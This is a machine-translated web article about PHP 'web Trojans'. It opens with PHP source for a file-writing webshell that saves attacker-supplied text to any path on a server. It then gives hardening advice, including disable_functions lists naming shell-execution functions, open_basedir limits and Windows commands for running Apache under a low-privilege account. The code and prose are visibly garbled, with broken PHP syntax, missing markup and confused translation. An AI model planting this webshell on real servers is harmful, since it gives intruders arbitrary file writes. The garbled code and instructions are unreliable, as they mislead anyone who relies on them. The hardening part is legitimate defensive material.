PHP Web Trojan
Copy CodeThe code is as follows:
Header ("content-type:text/html; charset=gb2312 ");
if (GET_MAGIC_QUOTES_GPC ()) foreach ($_post as $k = $v) $_post[$k] = stripslashes ($v);
?>
Save file Name:
<textarea name="text" cols="70" rows="18"></textarea>
if (isset ($_post[' file '))
{
$fp = @fopen ($_post[' file '], ' WB ');
Echo @fwrite ($fp, $_post[' text ')? ' Save succeeded! ': ' Save failed! ';
@fclose ($FP);
}
?>
A word php Trojan
Copy CodeThe code is as follows:
How to prevent PHP Trojan
PHP is one of the tools that allows you to generate dynamic Web pages. PHP Web files are treated as normal HTML Web files and you can write PHP in the usual way of editing HTML when editing.
PHP representative, hypertext Preprocessor (php:hypertext preprocessor), can be downloaded freely from the official PHP site (http://www.php.net). PHP complies with the GNU Public License (GPL), under which many popular software such as Linux and Emacs have been created. PHP works on most Unix platforms, Gun/linux and Microsoft Windows platforms. Information on how to install PHP on a PC or UNIX machine in a Windows environment can be found on the official PHP site. The installation process is simple.
Another advantage of PHP is that his security, with the development of the Internet now, network security more and more attention, the birth of PHP almost replaced the ASP, because PHP for security settings is very simple, not like the ASP requires a lot of steps, and disable a lot of services. But the good things will always be insufficient, if the default set of PHP consent is also vulnerable, so this article on how to do some security aspects of PHP configuration, to prevent the destruction of the script Trojan.
First, prevent PHP trojan execution Webshell
Open Safe_mode, in the php.ini, set the disable_functions= Passthru,exec,shell_exec,system either, or you can select them.
Second, prevent jumping out of the web directory
First modify the httpd.conf, if you only allow your PHP script to operate in the Web directory, you can also modify the httpd.conf file limit php operation path. For example, your web directory is/usr/local/apache/htdocs, then add a few lines in httpd.conf: Php_admin_value Open_basedir/usr/local/apache/htdocs, If the script is to read a file other than/usr/local/apache/htdocs will not be allowed, if the error display opens, it will prompt such an error: Warning:open_basedir restriction in effect. File is in wrong directory in/usr/local/apache/htdocs/open.php on line 4 and so on.
Third, prevent the PHP trojan read and write files directory
In the php.ini in the disable_functions= passthru,exec,shell_exec,system after adding PHP processing file functions, mainly Fopen,mkdir,rmdir,chmod,unlink, Dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile. That became disable_functions= Passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir, Fopen,fread,fclose, Fwrite,file_exists, Closedir,is_dir,readdir.opendir, Fileperms.copy,unlink,delfile.
OK, it's done, PHP Trojan take us out of the way, unfortunately, the use of the text database of those things can not be used. If it is built under the WinDOS platform Apache also need to note that Apache default operation is the system permissions, must give Apache down permissions, as follows:
NET user Apache F**kmicrosoft/add
net localgroup users Apache/del
At this point, a user who does not belong to any group Apche, just open the Computer Manager-Service-apache service Properties-log on-this account, here to fill in the accounts and passwords established above, restart Apache service can be implemented Apache run under low authority.
Summary: In fact, you can set the permissions of each folder, to each directory to create a separate read and write users, to achieve security. Many of the current virtual hosting providers of popular configuration methods, but this method to prevent this is a little bit overqualified. As long as our administrators have security awareness, the relative confinement of the function can guarantee the threat of cyber security.
The following are McAfee security settings that prevent some Web Trojan files from being generated.
Http://www.jb51.net/hack/list461_1.html
http://www.bkjia.com/PHPjc/320608.html www.bkjia.com true http://www.bkjia.com/PHPjc/320608.html techarticle PHP web Trojan Copy code code as follows:? PHP header ("content-type:text/html; charset=gb2312 "); if (GET_MAGIC_QUOTES_GPC ()) foreach ($_post as $k = $v) $_post[$k] = stripslashes ($v);
